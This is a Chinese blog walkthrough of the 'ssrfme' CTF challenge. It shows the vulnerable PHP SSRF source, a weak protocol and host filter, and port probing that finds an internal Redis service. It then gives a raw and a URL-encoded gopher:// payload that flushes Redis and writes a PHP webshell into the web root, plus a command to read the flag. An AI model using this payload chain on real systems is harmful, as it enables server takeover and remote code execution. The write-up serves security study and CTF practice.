Web-ssrfme复现

于 2024-08-25 23:27:15 发布
阅读量215 收藏 4
点赞数 2
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64238664/article/details/141536971
版权

目录

1.环境

2.分析源码

3.开始攻击 

 

1.环境

首先下载资源包,Ubuntu通过docker拉取环境。

docker-compose up -d
2.分析源码
<?php
highlight_file(__file__);
function curl($url){  
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    echo curl_exec($ch);
    curl_close($ch);
}

if(isset($_GET['url'])){
    $url = $_GET['url'];

    if(preg_match('/file\:\/\/|dict\:\/\/|\.\.\/|127.0.0.1|localhost/is', $url,$match))
    {

        die('No, No, No!');
    }
    curl($url);
}
if(isset($_GET['info'])){
    phpinfo();
}
?>

查看代码发现,存在url接收参数,传递参数尝试是否含有ssrf,发现确实存在ssrf。
但是查看代码发现,过滤了file、dict、localhost等,过滤dict是为了防止探测端口。

可以尝试一下url能不能有打印的东西

这里看见了,打印了两次也就是读取了两次文件,我就可以尝试使用端口探测burp

除了80端口也就2.3有点可疑

可以看到6379的端口也开放着,访问一下出现redis的报错就可以攻击了

 

3.开始攻击 

gopher://172.20.0.2:6379/_*1
$8
flushall
*3
$3
set
$1
1
$23


<?php system(`id`);


*4
$6
config
$3
set
$3
dir
$13
/var/www/html
*4
$6
config
$3
set
$10
dbfilename
$9
shell.php
*1
$4
save

gopher%3A%2F%2F172%2E20%2E0%2E2%3A6379%2F%5F%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252423%250D%250A%250A%250A%253C%253Fphp%2520system%2528%2560id%2560%2529%253B%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252420%250D%250A%2Fvar%2Fwww%2Fhtml%2Fupload%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell%2Ephp%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

要进行url编码在攻击

 

 <?php system(\"cat /flag\");?>来拿flag

成功了

jer‘jer’
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网鼎杯网络安全大赛玄武组_经典的一道CTF-WriteUP-SSRFME
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-02 1597
刚完整复现一遍redis,然后重新打了一下这道题,SSRF+本地redis主从复制RCE组合拳拿shell 拿不到flag+反弹shell的惨案到此为止吧,跟我一步步拿shell,CTF-WriteUP-SSRFME redis漏洞利用姿势原文https://www.sec-in.com/article/1309 一、环境说明,buuoj靶场,https://buuoj.cn/ 攻击机kali-公网(普通的centos和ubuntu机子一样效果) 二、打靶机注意:现在buuoj的这台靶机已经可以出网了,有公
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
[网鼎杯 2020 玄武组]SSRFMe
feng的博客
02-04 1237
前言 一道非常眼熟的SSRF题目了,一开始的代码审计现在已经成了很多SSRF教程中关于绕过127.0.0.1的过滤的一个例子,但是这题后面的redis主从复制却是我不会的东西。正好今天一个大师傅和我讨论了这题,就顺便做了这题,学习了一下redis的主从复制的SSRF。 WP 首先就是熟悉的代码审计: <?php function check_inner_ip($url) { $match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*
Buu-第二届网鼎杯_玄武组web_ssrfme
Fisher
06-08 1151
<?php function check_inner_ip($url) { $match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url); if (!$match_result) { die('url fomat error'); } try { $url_parse=parse_url($url); } catch
ssrf漏洞复现分析(1)
huizhaohaha的博客
08-25 516
但是我们查看/etc/shadow就不可,因为我们的权限不够,那我们使用dict协议看看服务器本地开启了哪些端口,经过测试,发现没有明显的反馈,那我们可以看一下页面返回值,来猜测。在这个IP地址下只开放了80端口,那这个时候好像有些束手无策了,但是我们转换思想,为什么不能存在其他ip地址呢,这毕竟是内网,我们便可以探测该网段上存活的主机了,这里我手动探查。172.21.0.2,这个ip下重新打印了一次当前页面,仔细看后发现这个是我们当前主机ip,这就很正常了。
SSRF漏洞复现
m0_65665796的博客
08-25 294
在这个IP地址下只开放了80端口,那这个时候好像有些束手无策了,但是我们转换思想,为什么不能存在其他ip地址呢,这毕竟是内网,我们便可以探测该网段上存活的主机了,这里我手动探查172.21.0.1,发现这个ip并没有什么反应。但是我们查看/etc/shadow就不可,因为我们的权限不够,那我们使用dict协议看看服务器本地开启了哪些端口,经过测试,发现没有明显的反馈,那我们可以看一下页面返回值,来猜测。172.21.0.3,在这个ip下,出现了不一样的结果,该漏洞需要部署在Linux下,拉取docker。
SSRF题目复现
qq_40909772的博客
11-19 2695
1. [HITCON 2017] SSRFme。 题目平台地址:https://buuoj.cn/challenges 进入题目环境之后是代码审计,代码如下: 59.49.169.109 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_AD
ssrf漏洞复现
Wincreds的博客
08-25 215
3.给info随便赋一个值,出来了php界面,可以观察到hostname主机和端口,而172.21.0.3是可以绕过127.0.0.1这个条件,我们可以在这个地址上测试,不断的改变端口值,端口不一样,出来的值也会有所区别。2.使用端口访问文件,可以看到有一个过滤条件,它限制了file,dict协议,127.0.0.1和localhost 也不能用,其实就是不想你探测内网端口,也不能读取内网服务文件。6.发现80端口不可用,后续请教同学,经过扫描ip以及分析,得出6379端口也是对外开放,
SSRF复现
最新发布
a15183865601的博客
08-25 217
由于这台内网主机上还存在一个http服务,所以我们可以将webshell写入其web目录,然后用ssrf进行访问。可以看到过滤了file,dict等,但get传参info会执行phpinfo()可以发现这里网站ip是172.18.0.3,可以使用这个地址绕过waf。猜测是没有写入权限,尝试看是否有其他目录,使用bp扫一下。有upload,重新生成一下payload。由于这里没有过滤gopher,可以利用。存在web服务,用bp探测下端口。开放了6379,有redis服务。探测下6379端口,发现没有。
[BUU刷题记录]day01-起步
anwen12的博客
12-13 4734
BUU-WEB 这是一个菜鸡的蜕变 先小记录一下题目环境部署必备的docker安装 sudo apt-get remove docker docker-engine docker.io containerd runc sudo apt-get update sudo apt-get install apt-transport-https ca-certificates curl gnupg lsb-release curl -fsSL https://download.docker.com/linux
point-nerf复现代码
05-30
point-nerf复现代码,github上提供的源码比较乱,而且在复现的时候一直出现bug,于是在测试point-nerf时将里面的代码进行了更改。在源码的基础上,将nerf_synth360_ft_dataset.py;evaluate.py;test_ft.py;...
机器学习大作业--复现论文.zip
05-08
在机器学习领域,复现论文是一项重要的实践活动,它不仅能帮助我们深入理解研究论文中的方法,还能验证算法的有效性,提高整个社区的科研可信度。在这个名为"机器学习大作业--复现论文.zip"的压缩包文件中,我们可以...
MPLS相关实验
2302_78454622的博客
08-20 592
4、R1上使用静态,R7上运行rip协议,R8上运行ospf协议。3、在R2、R3、R4、R5、R6上运行MPLS。2、R3、R4、R5、R6运行ospf。1、合理利用IP地址进行分配。一、实验拓扑图以及实验要求。一、实验拓扑图以及实验要求。
浏览器发送HTTP请求的过程
学Python的小白!
08-25 903
浏览器发送HTTP请求的过程是一个复杂但有序的步骤,‌主要包括以下几个阶段:‌1.构建请求,2.查找缓存、3.DNS解析、4.建立TCP连接、5.发送HTTP请求、6.服务器处理请求、7.服务器发送响应、8.客户端处理响应、9.关闭连接。
哪些类型的企业需要开展TPM管理培训?
tianxingjian713的博客
08-23 876
例如汽车制造企业、电子制造企业等,这些企业的生产线通常由大量高精度的自动化设备组成,一旦设备出现故障,可能会导致整个生产线停产,造成巨大的经济损失。开展TPM管理培训可以提高员工对设备的维护和管理能力,延长设备的使用寿命,降低设备维修成本,提高物流服务的效率和质量。通过开展TPM管理培训,让设备操作人员、维护人员和管理人员共同参与设备维护,实现设备的零故障运行,从而提高企业的竞争力。通过开展TPM管理培训,让员工了解设备的运行原理和风险点,加强设备的日常巡检和维护,提高设备的安全性和可靠性。
系统编程 网络 http协议
qq_69971969的博客
08-24 397
--------------------------------------表示了资源所在的路径。意思:域名解析=>把对应的域名解析为对应的ip。<协议>://<主机>:<端口>/<路径>万维网:http解决万维网之间互联互通。http:应用层协议,底层是tcp协议。http协议------应用层的协议。1.如何在万维网中表示一个资源?http协议加密:tls,ssl。计算机web网络只能看到文字。<http>只是协议的一种。html 超文本标记语言。http 超文本传输协议。
网络互联基础
任我行的博客
08-25 270
与集线器相连的所有主机组成一个简单局域网LAN,都属于同一个冲突域,且属于同一个广播域。
cve-2024-21733复现
08-20
CVE-2024-21733是一个编号的通用漏洞披露(CVE),用于标识特定的安全漏洞。不过,截至我的知识截止日期(2023年),该编号并未被分配给任何公开记录的漏洞,因此我无法提供关于CVE-2024-21733的具体复现信息。 然而,一般来说,复现一个已知的漏洞通常涉及以下步骤: 1. 环境准备:根据漏洞描述,搭建一个与漏洞相关的测试环境,包括操作系统、应用程序版本等。 2. 条件核实:验证环境是否满足漏洞触发的所有条件,比如特定配置或权限设置。 3. 利用代码/工具:使用已经公开的利用代码(Exploit)或者专用的漏洞利用工具尝试复现漏洞。 4. 观察结果:如果复现成功,观察系统的行为,以确保漏洞被成功利用。 5. 安全评估:分析漏洞可能带来的风险,并采取相应的安全措施来预防或缓解。 请注意,复现和利用安全漏洞可能违反法律法规,务必确保在合法和安全的环境下进行。通常,这类活动应由专业安全研究人员在授权的环境中执行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值